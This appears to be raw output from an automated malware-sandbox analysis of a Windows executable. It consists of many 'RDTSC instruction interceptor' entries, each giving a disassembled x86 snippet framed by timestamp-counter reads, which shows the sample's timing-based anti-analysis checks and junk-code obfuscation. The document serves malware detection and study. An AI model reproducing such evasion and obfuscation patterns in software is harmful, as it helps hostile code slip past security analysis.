Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 619937 second address: 619976 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a mov esi, dword ptr [ebp+122D1C78h] 0x00000010 nop 0x00000011 jmp 00007FCBA46BC740h 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FCBA46BC741h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 619976 second address: 619988 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 619988 second address: 61998E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 619B64 second address: 619B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 619DA8 second address: 619DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61B322 second address: 61B326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61B969 second address: 61B97B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA46BC73Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61C35B second address: 61C3B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FCBA4817E88h 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FCBA4817E78h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c mov esi, dword ptr [ebp+122D3922h] 0x00000032 push 00000000h 0x00000034 mov esi, 48731DDCh 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61C1FC second address: 61C202 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61C3B5 second address: 61C3D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61C202 second address: 61C206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61C3D2 second address: 61C3D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61E450 second address: 61E455 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61CBE4 second address: 61CBE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61CBE8 second address: 61CBEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D4A4D second address: 5D4A53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61EADB second address: 61EAE1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61EAE1 second address: 61EAF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA4817E84h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61F588 second address: 61F5FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov di, bx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FCBA46BC738h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b jmp 00007FCBA46BC745h 0x00000030 or dword ptr [ebp+122D2773h], esi 0x00000036 push 00000000h 0x00000038 jmp 00007FCBA46BC749h 0x0000003d xchg eax, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 push ecx 0x00000041 pushad 0x00000042 popad 0x00000043 pop ecx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61F5FE second address: 61F617 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007FCBA4817E7Eh 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 621480 second address: 621510 instructions: 0x00000000 rdtsc 0x00000002 je 00007FCBA46BC736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c jmp 00007FCBA46BC740h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007FCBA46BC738h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov esi, ebx 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edx 0x00000033 call 00007FCBA46BC738h 0x00000038 pop edx 0x00000039 mov dword ptr [esp+04h], edx 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc edx 0x00000046 push edx 0x00000047 ret 0x00000048 pop edx 0x00000049 ret 0x0000004a mov dword ptr [ebp+122D27EBh], ecx 0x00000050 push 00000000h 0x00000052 mov dword ptr [ebp+122D2BA9h], esi 0x00000058 xchg eax, ebx 0x00000059 jmp 00007FCBA46BC744h 0x0000005e push eax 0x0000005f js 00007FCBA46BC74Fh 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 pop eax 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 620712 second address: 620716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 621D93 second address: 621D98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62730A second address: 627310 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 627310 second address: 627380 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCBA46BC73Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FCBA46BC738h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edx 0x0000002c call 00007FCBA46BC738h 0x00000031 pop edx 0x00000032 mov dword ptr [esp+04h], edx 0x00000036 add dword ptr [esp+04h], 00000016h 0x0000003e inc edx 0x0000003f push edx 0x00000040 ret 0x00000041 pop edx 0x00000042 ret 0x00000043 mov ebx, 04D39903h 0x00000048 cmc 0x00000049 jne 00007FCBA46BC738h 0x0000004f push 00000000h 0x00000051 mov dword ptr [ebp+1244DF87h], ebx 0x00000057 xchg eax, esi 0x00000058 push edi 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 626364 second address: 626369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 627380 second address: 62739F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCBA46BC745h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 626369 second address: 626389 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b jp 00007FCBA4817E7Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 628442 second address: 628447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 628447 second address: 62845A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCBA4817E78h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62845A second address: 62845E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62845E second address: 628468 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FCBA4817E76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62A59E second address: 62A5AB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCBA46BC736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62A734 second address: 62A7C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 nop 0x00000008 mov di, EC62h 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov edi, ecx 0x00000015 mov dword ptr fs:[00000000h], esp 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007FCBA4817E78h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 and ebx, 3BDCC548h 0x0000003c xor edi, dword ptr [ebp+122D1825h] 0x00000042 mov eax, dword ptr [ebp+122D02B9h] 0x00000048 push 00000000h 0x0000004a push edi 0x0000004b call 00007FCBA4817E78h 0x00000050 pop edi 0x00000051 mov dword ptr [esp+04h], edi 0x00000055 add dword ptr [esp+04h], 00000016h 0x0000005d inc edi 0x0000005e push edi 0x0000005f ret 0x00000060 pop edi 0x00000061 ret 0x00000062 sub bh, FFFFFFA7h 0x00000065 push FFFFFFFFh 0x00000067 call 00007FCBA4817E7Fh 0x0000006c mov edi, dword ptr [ebp+122D279Ch] 0x00000072 pop ebx 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 push esi 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62A7C0 second address: 62A7C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62C966 second address: 62C96D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62E7CF second address: 62E7FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCBA46BC746h 0x00000008 jnp 00007FCBA46BC736h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnl 00007FCBA46BC738h 0x0000001a push eax 0x0000001b pop eax 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62F784 second address: 62F789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 630731 second address: 630737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 630737 second address: 630761 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007FCBA4817E78h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 630761 second address: 6307CA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FCBA46BC738h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 jmp 00007FCBA46BC73Ah 0x00000028 push 00000000h 0x0000002a mov di, 9F92h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007FCBA46BC738h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 0000001Dh 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a mov di, si 0x0000004d push eax 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 push edx 0x00000052 pop edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 632E35 second address: 632E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 633CA6 second address: 633D11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push ebx 0x0000000d xor ebx, dword ptr [ebp+122D3926h] 0x00000013 pop ebx 0x00000014 push 00000000h 0x00000016 mov di, si 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007FCBA46BC738h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 0000001Ah 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 movsx ebx, dx 0x00000038 mov edi, dword ptr [ebp+1244B235h] 0x0000003e xchg eax, esi 0x0000003f jmp 00007FCBA46BC743h 0x00000044 push eax 0x00000045 je 00007FCBA46BC748h 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 633D11 second address: 633D15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6308F2 second address: 630908 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCBA46BC73Ch 0x00000008 jnl 00007FCBA46BC736h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 635D28 second address: 635DBC instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCBA4817E76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FCBA4817E78h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+122D388Eh] 0x0000002b call 00007FCBA4817E82h 0x00000030 jnl 00007FCBA4817E7Ch 0x00000036 pop edi 0x00000037 push 00000000h 0x00000039 jmp 00007FCBA4817E84h 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push edi 0x00000043 call 00007FCBA4817E78h 0x00000048 pop edi 0x00000049 mov dword ptr [esp+04h], edi 0x0000004d add dword ptr [esp+04h], 00000017h 0x00000055 inc edi 0x00000056 push edi 0x00000057 ret 0x00000058 pop edi 0x00000059 ret 0x0000005a mov bl, ah 0x0000005c xchg eax, esi 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 jg 00007FCBA4817E76h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 635DBC second address: 635DC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 630908 second address: 63090F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 635DC0 second address: 635DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 635DC6 second address: 635DCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 636D6C second address: 636D76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FCBA46BC736h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 633E98 second address: 633EC1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCBA4817E80h 0x00000008 jmp 00007FCBA4817E7Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FCBA4817E82h 0x00000018 jmp 00007FCBA4817E7Ch 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 633EC1 second address: 633ECB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCBA46BC73Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62C95B second address: 62C966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 638FAF second address: 638FB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 638FB3 second address: 638FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 638FBB second address: 638FD0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FCBA46BC740h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 663E93 second address: 663E98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 663E98 second address: 663EC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA4817E81h 0x00000009 jmp 00007FCBA4817E84h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 663EC6 second address: 663ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6641D2 second address: 664209 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 ja 00007FCBA4817E76h 0x0000000f jmp 00007FCBA4817E89h 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 jnc 00007FCBA4817E78h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 664209 second address: 664221 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FCBA46BC73Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 664221 second address: 664225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 664225 second address: 664229 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66757C second address: 66758C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 ja 00007FCBA4817EA9h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66758C second address: 667590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 669C29 second address: 669C2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66DE83 second address: 66DE89 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E2A8 second address: 66E2F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA4817E88h 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 jmp 00007FCBA4817E84h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jno 00007FCBA4817E76h 0x00000021 jmp 00007FCBA4817E7Bh 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6727C4 second address: 6727C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6727C8 second address: 6727F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007FCBA4817E84h 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6727F4 second address: 672837 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCBA46BC744h 0x0000000e pushad 0x0000000f jmp 00007FCBA46BC747h 0x00000014 jmp 00007FCBA46BC73Bh 0x00000019 push edx 0x0000001a pop edx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 671F4C second address: 671F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FCBA4817E76h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 671F5A second address: 671F8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 jp 00007FCBA46BC73Ch 0x0000000d pushad 0x0000000e jmp 00007FCBA46BC743h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jl 00007FCBA46BC736h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 671F8E second address: 671F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 676B90 second address: 676BA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FCBA46BC736h 0x00000009 js 00007FCBA46BC736h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 676D23 second address: 676D2D instructions: 0x00000000 rdtsc 0x00000002 js 00007FCBA4817E76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 676D2D second address: 676D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 js 00007FCBA46BC736h 0x0000000d pop eax 0x0000000e pushad 0x0000000f jbe 00007FCBA46BC736h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
